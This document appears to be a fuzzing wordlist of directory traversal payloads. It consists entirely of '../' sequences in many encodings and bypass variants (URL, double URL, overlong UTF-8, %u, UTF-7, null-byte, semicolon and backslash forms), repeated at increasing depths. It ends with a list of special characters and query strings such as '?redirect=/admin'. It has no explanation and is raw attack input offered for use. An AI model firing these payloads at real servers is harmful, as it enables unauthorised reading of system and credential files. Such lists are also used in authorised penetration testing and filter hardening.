
..%2F
..%2F..%2F
..%2F..%2F..%2F
..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
..%252F
..%252F..%252F
..%252F..%252F..%252F
..%252F..%252F..%252F..%252F
..%252F..%252F..%252F..%252F..%252F
..%252F..%252F..%252F..%252F..%252F..%252F
..%252F..%252F..%252F..%252F..%252F..%252F..%252F
..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F
..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F
..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F
..%2f..%2f%23
..%2f..%2f%23..%2f..%2f%23
..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23
..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23
..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23
..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23
..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23
..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23
..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23
..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23..%2f..%2f%23
..;/
..;/..;/
..;/..;/..;/
..;/..;/..;/..;/
..;/..;/..;/..;/..;/
..;/..;/..;/..;/..;/..;/
..;/..;/..;/..;/..;/..;/..;/ 
..;/..;/..;/..;/..;/..;/..;/..;/
..;/ ..;/..;/..;/..;/..;/..;/..;/..;/ 
..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/
..;..;..;..;..;..;
%2e%2e%2f
%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%252e%252e%252f
%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
..\
..\
..\..\
..\..\
..\..\..\
..\..\..\..\
..\..\..\..\..\
..\..\..\..\..\..\
..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\
..\..\..\..\..\..\..\..\..\
..\../
..\../..../
..\../..../..../
..\../..../..../..../
..\../..../..../..../..../
..\../..../..../..../..../..../
..\../..../..../..../..../..../..../
..\../..../..../..../..../..../..../..../
..\../..../..../..../..../..../..../..../..../
..\../..../..../..../..../..../..../..../..../..../
.%c0%af
..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%u2215
..%u2215..%u2215
..%u2215..%u2215..%u2215
..%u2215..%u2215..%u2215..%u2215
..%u2215..%u2215..%u2215..%u2215..%u2215
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215
.%2e/
.%2e/.%2e/
.%2e/.%2e/.%2e/
.%2e/.%2e/.%2e/.%2e/
.%2e/.%2e/.%2e/.%2e/.%2e/
.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/
.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/
.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/
.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/
.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/
..%00
..%00..%00
..%00..%00..%00
..%00..%00..%00..%00
..%00..%00..%00..%00..%00
..%00..%00..%00..%00..%00..%00
..%00..%00..%00..%00..%00..%00..%00
..%00..%00..%00..%00..%00..%00..%00..%00
..%00..%00..%00..%00..%00..%00..%00..%00..%00
..%00..%00..%00..%00..%00..%00..%00..%00..%00..%00
..%5c
..%5c..%5c
..%5c..%5c..%5c 
..%5c..%5c..%5c..%5c  
..%5c..%5c..%5c..%5c..%5c 
..%5c..%5c..%5c..%5c..%5c..%5c 
..%5c..%5c..%5c..%5c..%5c..%5c..%5c 
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c  
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c
..%255c
..%255c..%255c
..%255C..%255C..%255C
..%255C..%255C..%255C..%255C
..%255C..%255C..%255C..%255C..%255C
..%255C..%255C..%255C..%255C..%255C..%255C
..%255C..%255C..%255C..%255C..%255C..%255C..%255C
..%255C..%255C..%255C..%255C..%255C..%255C..%255C..%255C
..%255C..%255C..%255C..%255C..%255C..%255C..%255C..%255C..%255C
..%255C..%255C..%255C..%255C..%255C..%255C..%255C..%255C..%255C..%255C
..%00
../%00
../../%00
../../../%00
../../../../%00
../../../../../%00
../../../../../../%00
../../../../../../../%00
../../../../../../../../%00
../../../../../../../../../%00
../../../../../../../../../../%00
..%20
..%20..%20
..%20..%20..%20
..%20..%20..%20..%20
..%20..%20..%20..%20..%20
..%20..%20..%20..%20..%20..%20
..%20..%20..%20..%20..%20..%20..%20
..%20..%20..%20..%20..%20..%20..%20..%20
..%20..%20..%20..%20..%20..%20..%20..%20..%20
..%20..%20..%20..%20..%20..%20..%20..%20..%20..%20
..%0a
..%0a..%0a
..%0a..%0a..%0a
..%0a..%0a..%0a..%0a..%0a
..%0a..%0a..%0a..%0a..%0a
..%0a..%0a..%0a..%0a..%0a..%0a
..%0a..%0a..%0a..%0a..%0a..%0a..%0a
..%0a..%0a..%0a..%0a..%0a..%0a..%0a..%0a..%0a..%0a
..%0a..%0a..%0a..%0a..%0a..%0a..%0a..%0a..%0a..%0a..%0a
../../%23
../../../%23
../../../../%23
../../../../../%23
../../../../../../%23
../../../../../../%23
../../../../../../../%23
../../../../../../../../%23
../../../../../../../../../../%23
../../../.../../../../../../../%23
..%2F..%5C
..%2F..%5C..%2F..%5C..%2F..%5C
..%2F..%5C..%2F..%5C
..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C
..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C
..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C
..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C
..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C
..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C..%2F..%5C
..%09
..%09..%09
..%09..%09..%09
..%09..%09..%09..%09
..%09..%09..%09..%09..%09
..%09..%09..%09..%09..%09..%09
..%09..%09..%09..%09..%09..%09..%09
..%09..%09..%09..%09..%09..%09..%09..%09
..%09..%09..%09..%09..%09..%09..%09..%09..%09
..%09..%09..%09..%09..%09..%09..%09..%09..%09..%09
....//
....//....//
....//....//....//
....//....//....//....//
....//....//....//....//....//
....//....//....//....//....//....//
....//....//....//....//....//....//....//
....//....//....//....//....//....//....//....//
....//....//....//....//....//....//....//....//....//
....//....//....//....//....//....//....//....//....//....//
%E5%98%8A%E5%98%8D
%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D
%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D
%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D
%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D
%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D
%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D
%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D
%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D
../...//
../../..//
../../../..//
../../../../..//
../../../../../..//
../../../../../../..//
../../../../../../../..//
../../../../../../../../..//
../../../../../../../../../..//
../../../../../../../../../../..//
/.%00./
/.%00./.%00./
/.%00./.%00./.%00./
/.%00./.%00./.%00./.%00./
/.%00./.%00./.%00./.%00./.%00./
/.%00./.%00.//.%00./.%00./.%00./.%00./
..%e2%81%a0
..%e2%81%a0..%e2%81%a0
..%e2%81%a0..%e2%81%a0..%e2%81%a0
..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0
..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0
..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0
..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0
..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0
..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0
..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0..%e2%81%a0
..%2F%00
..%2F%00..%2F%00
..%2F%00..%2F%00..%2F%00
..%2F%00..%2F%00..%2F%00..%2F%00
..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00
..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00
..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00
..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00
..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00
..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00..%2F%00
%2e%2e%5c
%2e%2e%5c%2e%2e%5c
%2e%2e%5c%2e%2e%5c%2e%2e%5c
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c
..%252F%00
..%252F%00..%252F%00
..%252F%00..%252F%00..%252F%00
..%252F%00..%252F%00..%252F%00..%252F%00
..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00
..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00
..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00
..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00
..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00
..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00..%252F%00
../../../%00..\0
../../../../%00..\0
../../../../../../../../../../%00..\0
..;//
..;//..;//
..;//..;//..;//
..;//..;//..;//..;//
..;//..;//..;//..;//..;//
..;//..;//..;//..;//..;//..;//
..;//..;//..;//..;//..;//..;//..;//
..;//..;//..;//..;//..;//..;//..;//..;//
..;//..;//..;//..;//..;//..;//..;//..;//..;//
..;//..;//..;//..;//..;//..;//..;//..;//..;//..;//
..%2f?
..%2f..%2f?
..%2f?..%2f?..%2f?
..%2f?..%2f?..%2f?..%2f?
..%2f?..%2f?..%2f?..%2f?..%2f?
..%2f?..%2f?..%2f?..%2f?..%2f?..%2f?
..%2f?..%2f?..%2f?..%2f?..%2f?..%2f?..%2f?
..%2f?..%2f?..%2f?..%2f?..%2f?..%2f?..%2f?..%2f?
..%2f?..%2f?..%2f?..%2f?..%2f?..%2f?..%2f?..%2f?..%2f?
..%2f?..%2f?..%2f?..%2f?..%2f?..%2f?..%2f?..%2f?..%2f?..%2f?
/..%23
/..%23/..%23
/..%23/..%23/..%23
/..%23/..%23/..%23/..%23
/..%23/..%23/..%23/..%23/..%23
/..%23/..%23/..%23/..%23/..%23/..%23
/..%23/..%23/..%23/..%23/..%23/..%23/..%23
/..%23/..%23/..%23/..%23/..%23/..%23/..%23/..%23
/..%23/..%23/..%23/..%23/..%23/..%23/..%23/..%23/..%23
/..%23/..%23/..%23/..%23/..%23/..%23/..%23/..%23/..%23/..%23
%u002e%u002e%u2215
%u002e%u002e%u2215%u002e%u002e%u2215
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215
%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215
%c0%2e%c0%2e%c0%2e
%c0%2e%e0%40%ae%c0%2e
%c0ae%c0%af%c0%2f
%c0%2e%c0%2e%c0%2e%c0%2e
%e0%80%af%c0%5c%c0%5c
%c0%2e%c0%2e%c0%2e%c0%2e%c0%2e
%c0%2e%c0%2e%c0%2e%c0%2e%c0%2e%c0%2e
%c0%2e%c0%2e%c0%2e%c0%2e%c0%2e%c0%2e%c0%2e
%c0%2e%c0%2e%c0%2e%c0%2e%c0%2e%c0%2e%c0%2e%c0%2e
%c0%2e%c0%2e%c0%2e%c0%2e%c0%2e%c0%2e%c0%2e%c0%2e%c0%2e
%c1%1c
%c0%af
%c0%af%c0%af
%c0%af%c0%af%c0%af
%c0%af%c0%af%c0%af%c0%af
%c0%af%c0%af%c0%af%c0%af%c0%af
%c0%af%c0%af%c0%af%c0%af%c0%af%c0%af
%c0%af%c0%af%c0%af%c0%af%c0%af%c0%af%c0%af
%c0%af%c0%af%c0%af%c0%af%c0%af%c0%af%c0%af%c0%af
%c0%af%c0%af%c0%af%c0%af%c0%af%c0%af%c0%af%c0%af%c0%af
+AC4-AFw-
+AC4-AFw-+AC4-AFw-
+AC4-AFw-+AC4-AFw-+AC4-AFw-
+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-
+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-
+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-
+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-
+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-
+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-
+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-+AC4-AFw-

....//
...\//
..//..//..\
....//..//..//..//..//..//..
..\..\//..\..\//..\..\//..\..\
..//..\//..\..\//..//..//..
...\..\//..\..\//..//..//..
..\..\//..//..\..\..\..\..\..
....//..\..\..\..\..\..\..\..
...\//..\..\..\..\..\..\..\//..\
../%23
../../../../%23
../
../../
../../../
../../../../
../../../../../
../../../../../../
../ ../ ../ ../
..;//
..;/
..;/..;/
..%2F%23
..%2f?
..%2f%
/..%23
../../%23
../../../%23
..%2F%23
#../
.%2e/
%2e%2e/
%2e%2e%2f
%252e%252e%252f
....//
....////
......//
........//
..........//
/.%2e/
/%2e%2e/
/%252e%252e/
..%ff/
..%2f%00
/%2e%2e%2f%00
/%2e./
..%2F%00
../../../%00..\0
..;/
..\..\..\
..\..\..\..\
%2e%2e/
%2e%2e/%2e%2e/
%2e%2e/%2e%2e/%2e%2e/
%2e%2e/%2e%2e/%2e%2e/%2e%2e/
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/
..%2F%00
../#
../../#
../../../#
../../../../#
../?#
../?a=#
../#/
../%23
../../%23
../../../%23
..\
..\..\
..\..\..\
..\..\..\..\
..\..\..\..\..\
/..\
/../
/..%2F
\..\
%0A
%E5%98%8A%E5%98%8D	
%F0%9F%92%A9	
%F0%9F%91%8D	
%0D
../
..\
..%2F
..%5C
..%2F
#
%23
?
%3F
;
%3B
&
%26
%2E%2E%2F
%2E%2E%5C
%252E%252E%252F
%252F
/..
\..
%2F..
%5C..
%5C
%2F
%00
%2500
%00
%2500
%E2%81%A0
%E2%80%8B
%E2%80%8C
%E2%80%8D
%C0%AF
%C1%9C
/
//
.
..
.../
/%2E
%252E
%00
%23
%2F
%5C
%c0%af
%c1%9c
?
&
#
?test=
?debug=1
?redirect=/admin
#comment
()
[]
{}
%09
%0A
%0D
💩
.;/
.;\
.\
.\
..;/
..;/..;/
%20
%09
%0A
%0D
..%2f
..;/
../
..%00/
..%0d/
..%5c
..\
;
,
"
.
*
..%ff/
%2e%2e%2f
.%2e/
%3f
%26
%23
/..;/..;/..;


